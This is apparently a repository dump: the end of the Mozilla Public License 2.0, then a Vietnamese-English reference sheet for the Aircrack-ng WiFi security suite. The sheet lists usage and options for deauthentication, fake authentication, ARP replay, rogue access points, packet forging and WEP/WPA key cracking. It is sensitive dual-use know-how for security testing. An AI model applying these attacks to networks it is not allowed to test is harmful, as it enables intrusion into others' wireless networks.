------------------------- * 265 | * * 266 | * Covered Software is provided under this License on an "as is" * 267 | * basis, without warranty of any kind, either expressed, implied, or * 268 | * statutory, including, without limitation, warranties that the * 269 | * Covered Software is free of defects, merchantable, fit for a * 270 | * particular purpose or non-infringing. The entire risk as to the * 271 | * quality and performance of the Covered Software is with You. * 272 | * Should any Covered Software prove defective in any respect, You * 273 | * (not any Contributor) assume the cost of any necessary servicing, * 274 | * repair, or correction. This disclaimer of warranty constitutes an * 275 | * essential part of this License. No use of any Covered Software is * 276 | * authorized under this License except under this disclaimer. * 277 | * * 278 | ************************************************************************ 279 | 280 | ************************************************************************ 281 | * * 282 | * 7. Limitation of Liability * 283 | * -------------------------- * 284 | * * 285 | * Under no circumstances and under no legal theory, whether tort * 286 | * (including negligence), contract, or otherwise, shall any * 287 | * Contributor, or anyone who distributes Covered Software as * 288 | * permitted above, be liable to You for any direct, indirect, * 289 | * special, incidental, or consequential damages of any character * 290 | * including, without limitation, damages for lost profits, loss of * 291 | * goodwill, work stoppage, computer failure or malfunction, or any * 292 | * and all other commercial damages or losses, even if such party * 293 | * shall have been informed of the possibility of such damages. This * 294 | * limitation of liability shall not apply to liability for death or * 295 | * personal injury resulting from such party's negligence to the * 296 | * extent applicable law prohibits such limitation. Some * 297 | * jurisdictions do not allow the exclusion or limitation of * 298 | * incidental or consequential damages, so this exclusion and * 299 | * limitation may not apply to You. * 300 | * * 301 | ************************************************************************ 302 | 303 | 8. Litigation 304 | ------------- 305 | 306 | Any litigation relating to this License may be brought only in the 307 | courts of a jurisdiction where the defendant maintains its principal 308 | place of business and such litigation shall be governed by laws of that 309 | jurisdiction, without reference to its conflict-of-law provisions. 310 | Nothing in this Section shall prevent a party's ability to bring 311 | cross-claims or counter-claims. 312 | 313 | 9. Miscellaneous 314 | ---------------- 315 | 316 | This License represents the complete agreement concerning the subject 317 | matter hereof. If any provision of this License is held to be 318 | unenforceable, such provision shall be reformed only to the extent 319 | necessary to make it enforceable. Any law or regulation which provides 320 | that the language of a contract shall be construed against the drafter 321 | shall not be used to construe this License against a Contributor. 322 | 323 | 10. Versions of the License 324 | --------------------------- 325 | 326 | 10.1. New Versions 327 | 328 | Mozilla Foundation is the license steward. Except as provided in Section 329 | 10.3, no one other than the license steward has the right to modify or 330 | publish new versions of this License. Each version will be given a 331 | distinguishing version number. 332 | 333 | 10.2. Effect of New Versions 334 | 335 | You may distribute the Covered Software under the terms of the version 336 | of the License under which You originally received the Covered Software, 337 | or under the terms of any subsequent version published by the license 338 | steward. 339 | 340 | 10.3. Modified Versions 341 | 342 | If you create software not governed by this License, and you want to 343 | create a new license for such software, you may create and use a 344 | modified version of this License if you rename the license and remove 345 | any references to the name of the license steward (except to note that 346 | such modified license differs from this License). 347 | 348 | 10.4. Distributing Source Code Form that is Incompatible With Secondary 349 | Licenses 350 | 351 | If You choose to distribute Source Code Form that is Incompatible With 352 | Secondary Licenses under the terms of this version of the License, the 353 | notice described in Exhibit B of this License must be attached. 354 | 355 | Exhibit A - Source Code Form License Notice 356 | ------------------------------------------- 357 | 358 | This Source Code Form is subject to the terms of the Mozilla Public 359 | License, v. 2.0. If a copy of the MPL was not distributed with this 360 | file, You can obtain one at http://mozilla.org/MPL/2.0/. 361 | 362 | If it is not possible or desirable to put the notice in a particular 363 | file, then You may include the notice in a location (such as a LICENSE 364 | file in a relevant directory) where a recipient would be likely to look 365 | for such a notice. 366 | 367 | You may add additional accurate notices of copyright ownership. 368 | 369 | Exhibit B - "Incompatible With Secondary Licenses" Notice 370 | --------------------------------------------------------- 371 | 372 | This Source Code Form is "Incompatible With Secondary Licenses", as 373 | defined by the Mozilla Public License, v. 2.0. 374 | -------------------------------------------------------------------------------- /All-tools.md: -------------------------------------------------------------------------------- 1 | # All tools 2 | 3 | ## Sơ lược 4 | 5 | [Aircrack-ng](https://www.aircrack-ng.org/) is a complete suite of tools to assess WiFi network security. 6 | 7 | - Monitoring: Packet capture and export of data to text files for further processing by third party tools 8 | - Attacking: Replay attacks, deauthentication, fake access points and others via packet injection 9 | - Testing: Checking WiFi cards and driver capabilities (capture and injection) 10 | - Cracking: WEP and WPA1/2 PSK 11 | 12 | Aircrack-ng có rất nhiều công cụ, một số là: 13 | 14 | ### [Airmon-ng](https://www.aircrack-ng.org/doku.php?id=airmon-ng) 15 | 16 | dùng để chuyển card mạng của bạn từ manager sang monitor 17 | 18 | Enable monitor mode, kill network managers, go back managed mode, show the interfaces status 19 | 20 | ``` 21 | airmon-ng [channel] or airmon-ng 22 | ``` 23 | 24 |
25 | 26 | ``` 27 | indicates if you wish to start or stop the interface. (Mandatory) 28 | specifies the interface. (Mandatory) 29 | [channel] optionally set the card to a specific channel. 30 | "check" will show any processes that might interfere with the aircrack-ng suite. It is strongly recommended that these processes be eliminated prior to using the aircrack-ng suite. "check kill" will check and kill off processes that might interfere with the aircrack-ng suite. For “check kill” see 31 | ``` 32 | 33 |
34 | 35 | ### [Airodump-ng](https://www.aircrack-ng.org/doku.php?id=airodump-ng) 36 | 37 | dùng để bắt gói tin trong mạng wifi 38 | 39 | Detected access points, packet capture, capturing raw 802.11 frames, collecting WEP IVs or WPA handshakes, log the coordinates 40 | 41 | ``` 42 | airodump-ng [,,...] 43 | ``` 44 | 45 |
46 | 47 | ``` 48 | Options: 49 | --ivs : Save only captured IVs 50 | --gpsd : Use GPSd 51 | --write : Dump file prefix 52 | -w : same as --write 53 | --beacons : Record all beacons in dump file 54 | --update : Display update delay in seconds 55 | --showack : Prints ack/cts/rts statistics 56 | -h : Hides known stations for --showack 57 | -f : Time in ms between hopping channels 58 | --berlin : Time before removing the AP/client 59 | from the screen when no more packets 60 | are received (Default: 120 seconds) 61 | -r : Read packets from that file 62 | -T : While reading packets from a file, 63 | simulate the arrival rate of them 64 | as if they were "live". 65 | -x : Active Scanning Simulation 66 | --manufacturer : Display manufacturer from IEEE OUI list 67 | --uptime : Display AP Uptime from Beacon Timestamp 68 | --wps : Display WPS information (if any) 69 | --output-format 70 | : Output format. Possible values: 71 | pcap, ivs, csv, gps, kismet, netxml, logcsv 72 | --ignore-negative-one : Removes the message that says 73 | fixed channel : -1 74 | --write-interval 75 | : Output file(s) write interval in seconds 76 | --background : Override background detection. 77 | -n : Minimum AP packets recv'd before 78 | for displaying it 79 | Filter options: 80 | --encrypt : Filter APs by cipher suite 81 | --netmask : Filter APs by mask 82 | --bssid : Filter APs by BSSID 83 | --essid : Filter APs by ESSID 84 | --essid-regex : Filter APs by ESSID using a regular 85 | expression 86 | -a : Filter unassociated clients 87 | 88 | By default, airodump-ng hop on 2.4GHz channels. 89 | You can make it capture on other/specific channel(s) by using: 90 | --ht20 : Set channel to HT20 (802.11n) 91 | --ht40- : Set channel to HT40- (802.11n) 92 | --ht40+ : Set channel to HT40+ (802.11n) 93 | --channel : Capture on specific channels 94 | --band : Band on which airodump-ng should hop 95 | -C : Uses these frequencies in MHz to hop 96 | --cswitch : Set channel switching method 97 | 0 : FIFO (default) 98 | 1 : Round Robin 99 | 2 : Hop on last 100 | -s : same as --cswitch 101 | 102 | --help : Displays this usage screen 103 | ``` 104 | 105 |
106 | 107 | ### [Aireplay-ng](https://www.aircrack-ng.org/doku.php?id=aireplay-ng) 108 | 109 | dùng để tạo ra gói tin inject gửi tới AP nhằm nhận các gói ARP phản hồi. 110 | 111 | Generate traffic, deauthentications, fake authentications, Interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection,... 112 | 113 | ``` 114 | aireplay-ng 115 | ``` 116 | 117 |
118 | 119 | ``` 120 | Filter options: 121 | 122 | -b bssid : MAC address, Access Point 123 | -d dmac : MAC address, Destination 124 | -s smac : MAC address, Source 125 | -m len : minimum packet length 126 | -n len : maximum packet length 127 | -u type : frame control, type field 128 | -v subt : frame control, subtype field 129 | -t tods : frame control, To DS bit 130 | -f fromds : frame control, From DS bit 131 | -w iswep : frame control, WEP bit 132 | 133 | Replay options: 134 | 135 | -x nbpps : number of packets per second 136 | -p fctrl : set frame control word (hex) 137 | -a bssid : set Access Point MAC address 138 | -c dmac : set Destination MAC address 139 | -h smac : set Source MAC address 140 | -e essid : For fakeauth attack or injection test, it sets target AP SSID. This is optional when the SSID is not hidden. 141 | -j : arpreplay attack : inject FromDS pkts 142 | -g value : change ring buffer size (default: 8) 143 | -k IP : set destination IP in fragments 144 | -l IP : set source IP in fragments 145 | -o npckts : number of packets per burst (-1) 146 | -q sec : seconds between keep-alives (-1) 147 | -y prga : keystream for shared key auth 148 | -B –-bittest : bit rate test (Applies only to test mode) 149 | -D :disables AP detection. Some modes will not proceed if the AP beacon is not heard. This disables this functionality. 150 | -F –-fast : chooses first matching packet. For test mode, it just checks basic injection and skips all other tests. 151 | -R disables /dev/rtc usage. Some systems experience lockups or other problems with RTC. This disables the usage. 152 | 153 | Source options: 154 | 155 | iface : capture packets from this interface 156 | -r file : extract packets from this pcap file 157 | 158 | Attack modes (Numbers can still be used): 159 | 160 | --deauth count : deauthenticate 1 or all stations (-0) 161 | --fakeauth delay : fake authentication with AP (-1) 162 | --interactive : interactive frame selection (-2) 163 | --arpreplay : standard ARP-request replay (-3) 164 | --chopchop : decrypt/chopchop WEP packet (-4) 165 | --fragment : generates valid keystream (-5) 166 | --test : injection test (-9) 167 | ``` 168 | 169 |
170 | 171 | ## [Airbase-ng](https://www.aircrack-ng.org/doku.php?id=airbase-ng) 172 | 173 | tạo điểm truy cập giả mạo 174 | 175 | Caffe Latte WEP client attack, Hirte WEP client attack, WPA/WPA2 handshake, act as an ad-hoc Access Point, act as a full Access Point,... 176 | 177 | ``` 178 | airbase-ng 179 | ``` 180 | 181 |
182 | 183 | ``` 184 | Options: 185 | 186 | -a bssid : set Access Point MAC address 187 | -i iface : capture packets from this interface 188 | -w WEP key : use this WEP key to encrypt/decrypt packets 189 | -h MAC : source mac for MITM mode 190 | -f disallow : disallow specified client MACs (default: allow) 191 | -W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto) 192 | -q : quiet (do not print statistics) 193 | -v : verbose (print more messages) (long --verbose) 194 | -M : M-I-T-M between [specified] clients and bssids (NOT CURRENTLY IMPLEMENTED) 195 | -A : Ad-Hoc Mode (allows other clients to peer) (long --ad-hoc) 196 | -Y in|out|both : external packet processing 197 | -c channel : sets the channel the AP is running on 198 | -X : hidden ESSID (long --hidden) 199 | -s : force shared key authentication 200 | -S : set shared key challenge length (default: 128) 201 | -L : Caffe-Latte attack (long --caffe-latte) 202 | -N : Hirte attack (cfrag attack), creates arp request against wep client (long –cfrag) 203 | -x nbpps : number of packets per second (default: 100) 204 | -y : disables responses to broadcast probes 205 | -0 : set all WPA,WEP,open tags. can't be used with -z & -Z 206 | -z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 207 | -Z type : same as -z, but for WPA2 208 | -V type : fake EAPOL 1=MD5 2=SHA1 3=auto 209 | -F prefix : write all sent and received frames into pcap file 210 | -P : respond to all probes, even when specifying ESSIDs 211 | -I interval : sets the beacon interval value in ms 212 | -C seconds : enables beaconing of probed ESSID values (requires -P) 213 | 214 | Filter options: 215 | 216 | --bssid : BSSID to filter/use (short -b) 217 | --bssids : read a list of BSSIDs out of that file (short -B) 218 | --client : MAC of client to accept (short -d) 219 | --clients : read a list of MACs out of that file (short -D) 220 | --essid : specify a single ESSID (short -e) 221 | --essids : read a list of ESSIDs out of that file (short -E) 222 | ``` 223 | 224 |
225 | 226 | ## [Packetforge-ng](https://www.aircrack-ng.org/doku.php?id=packetforge-ng) 227 | 228 | dùng để gửi các gói tin giả trên tới AP để nhận phản hồi. 229 | 230 | Create encrypted packets such as arp requests, UDP, ICMP and custom packets 231 | 232 | ``` 233 | packetforge-ng 234 | ``` 235 | 236 |
237 | 238 | ``` 239 | Forge options 240 | 241 | -p : set frame control word (hex) 242 | -a : set Access Point MAC address 243 | -c : set Destination MAC address 244 | -h : set Source MAC address 245 | -j : set FromDS bit 246 | -o : clear ToDS bit 247 | -e : disables WEP encryption 248 | -k : set Destination IP [Port] 249 | -l : set Source IP [Port] (Dash lowercase letter L) 250 | -t ttl : set Time To Live 251 | -w : write packet to this pcap file 252 | 253 | Source options 254 | 255 | -r : read packet from this raw file 256 | -y : read PRGA from this file 257 | 258 | Modes 259 | --arp : forge an ARP packet (-0) 260 | --udp : forge an UDP packet (-1) 261 | --icmp : forge an ICMP packet (-2) 262 | --null : build a null packet (-3) 263 | --custom : build a custom packet (-9) 264 | ``` 265 | 266 |
267 | 268 | ## [Airolib-ng](https://www.aircrack-ng.org/doku.php?id=airolib-ng) 269 | 270 | tạo ra một cơ sở dữ liệu khóa đã được tính toán trước, làm đơn giản hóa quá trình crack key 271 | 272 | Store and manage essid and password lists, compute PMKs, WPA/WPA2 cracking 273 | 274 | ``` 275 | airolib [options] 276 | ``` 277 | 278 |
279 | 280 | ``` 281 | Operations: 282 | 283 | --stats - Output some information about the database. 284 | --sql {sql} - Execute the specified SQL statement. 285 | --clean [all] - Perform steps to clean the database from old junk. The option 'all' will also reduce file size if possible and run an integrity check. 286 | --batch - Start batch-processing all combinations of ESSIDs and passwords. This must be run prior to using the database within aircrack-ng or after you have added additional SSIDs or passwords. 287 | --verify [all] - Verify a set of randomly chosen PMKs. If the option 'all' is given, all(!) PMKs in the database are verified and the incorrect ones are deleted. 288 | --export cowpatty {essid} {file} - Export to a cowpatty file. 289 | --import cowpatty {file} - Import a cowpatty file and create the database if it does not exist. 290 | --import {essid|passwd} {file} - Import a text flat file as a list of either ESSIDs or passwords and create the database if it does not exist. This file must contain one essid or password per line. Lines should be terminated with line feeds. Meaning press "enter" at the end of each line when entering the values. 291 | ``` 292 | 293 |
294 | 295 | ## [Airoscript-ng](https://www.aircrack-ng.org/doku.php?id=airoscript-ng) 296 | 297 | tự động hóa mọi công đoạn, bạn chỉ việc đưa vào mac AP, chọn kiểu tấn công và ngồi chờ 298 | 299 | interface to interact with Aicrack-ng and easy WEP and WPA networks attacks, allow to save time from writing commands 300 | 301 | ``` 302 | airoscript-ng [options] 303 | ``` 304 | 305 |
306 | 307 | ``` 308 | Options 309 | 310 | -t terminal Specify terminal (xterm or screen) 311 | -c none Launches an interface selection menu (requires -pzenity) 312 | -w wireless_card Specify wifi card 313 | -b file Writes a csv file with network data 314 | -m mac_mode Change mac to fakemac before everything else. (mac_mode = fakemac or realmac) 315 | -a none Automatic mode 316 | -n regex Filter SSID by regex 317 | -x none Autoconfigure network after automatic crack (requires -a) 318 | -z none Don't scan automatically at start 319 | -p plugin file Load plugin at start 320 | -v none Verbose & debug mode 321 | -h none Displays this usage screen 322 | ``` 323 | 324 |
325 | 326 | ## [Aircrack-ng](https://www.aircrack-ng.org/doku.php?id=aircrack-ng) 327 | 328 | crack wep hay dò khóa đều dùng nó 329 | 330 | Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program. 331 | 332 | ``` 333 | aircrack-ng [options] 334 | ``` 335 | 336 |
337 | 338 | ``` 339 | Common options 340 | 341 | -a amode Force attack mode (1 = static WEP, 2 = WPA/WPA2-PSK) 342 | -e essid If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA/WPA2-PSK cracking if the ESSID is not broadcasted (hidden) 343 | -b bssid Long version --bssid. Select the target network based on the access point's MAC address 344 | -p nbcpu On SMP systems: # of CPU to use. This option is invalid on non-SMP systems 345 | -q Enable quiet mode (no status output until the key is found, or not) 346 | -C MACs Long version --combine. Merge the given APs (separated by a comma) into virtual one 347 | -l file name (Lowercase L, ell) logs the key to the file specified. Overwrites the file if it already exists 348 | 349 | Static WEP cracking options 350 | 351 | -c Restrict the search space to alpha-numeric characters only (0x20 - 0x7F) 352 | -t Restrict the search space to binary coded decimal hex characters 353 | -h Restrict the search space to numeric characters (0x30-0x39) These keys are used by default in most Fritz!BOXes 354 | -d start Long version --debug. Set the beginning of the WEP key (in hex), for debugging purposes 355 | -m maddr MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network 356 | -n nbits Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128 357 | -i index Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index 358 | -f fudge By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelyhood of success 359 | -k korek There are 17 korek statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, … -k 17 to disable each attack selectively 360 | -x/-x0 Disable last keybytes brutforce 361 | -x1 Enable last keybyte bruteforcing (default) 362 | -x2 Enable last two keybytes bruteforcing 363 | -X Disable bruteforce multithreading (SMP only) 364 | -s Show the key in ASCII while cracking 365 | -y Experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs 366 | -z Invokes the PTW WEP cracking method (Default in v1.x) 367 | -P number Long version --ptw-debug. Invokes the PTW debug mode: 1 Disable klein, 2 PTW. 368 | -K Invokes the Korek WEP cracking method. (Default in v0.x) 369 | -D Long version --wep-decloak. Run in WEP decloak mode 370 | -1 Long version --oneshot. Run only 1 try to crack key with PTW 371 | -M number (WEP cracking) Specify the maximum number of IVs to use 372 | -V Long version --visual-inspection. Run in visual inspection mode (only with KoreK) 373 | 374 | WEP and WPA-PSK cracking options 375 | 376 | -w words Path to a wordlists or “-” without the quotes for standard in (stdin). Separate multiple wordlists by comma 377 | -N file Create a new cracking session and save it to the specified file 378 | -R file Restore cracking session from the specified file 379 | 380 | WPA-PSK options 381 | 382 | -E file Create EWSA Project file v3 383 | -j file Create Hashcat v3.6+ Capture file (HCCAPX) 384 | -J file Create Hashcat Capture file 385 | -S WPA cracking speed test 386 | -Z sec WPA cracking speed test execution length in seconds 387 | -r database Utilizes a database generated by airolib-ng as input to determine the WPA key. Outputs an error message if aircrack-ng has not been compiled with sqlite support 388 | 389 | SIMD Selection 390 | 391 | --simd optimization Use user-specified SIMD optimization instead of the fastest one 392 | --simd-list Shows a list of the SIMD optimizations available 393 | ``` 394 | 395 |
396 | 397 | ## Other tools 398 | 399 | - Airodump-ng-oui-update 400 | - [Airserv-ng](https://www.aircrack-ng.org/doku.php?id=airserv-ng) 401 | - [Airtun-ng](https://www.aircrack-ng.org/doku.php?id=airtun-ng) 402 | - [Besside-ng](https://www.aircrack-ng.org/doku.php?id=besside-ng) 403 | - [Easside-ng](https://www.aircrack-ng.org/doku.php?id=easside-ng) 404 | - [Tkiptun-ng](https://www.aircrack-ng.org/doku.php?id=tkiptun-ng) 405 | - [Wesside-ng](https://www.aircrack-ng.org/doku.php?id=wesside-ng) 406 | - [Airdecap-ng](https://www.aircrack-ng.org/doku.php?id=airdecap-ng) 407 | - [Airdecloak-ng](https://www.aircrack-ng.org/doku.php?id=airdecloak-ng) 408 | - Besside-ng-crawler 409 | - Buddy-ng 410 | - Ivstools 411 | - Kstats 412 | - Makeivs-ng 413 | - Wpaclean 414 | - Airventriloquist 415 | - [Airdriver-ng](https://www.aircrack-ng.org/doku.php?id=airdriver-ng) 416 | - [Airdrop-ng](https://www.aircrack-ng.org/doku.php?id=airdrop-ng) 417 | - [Airgraph-ng](https://www.aircrack-ng.org/doku.php?id=airgraph-ng) 418 | - [Wlan-ng](https://www.aircrack-ng.org/doku.php?id=wlan-ng) 419 | - ... 420 | 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | 429 | 430 | 431 | 432 | 433 | 434 | 435 | 436 | 437 | 438 | 439 | --------------------------------------------------------------------------------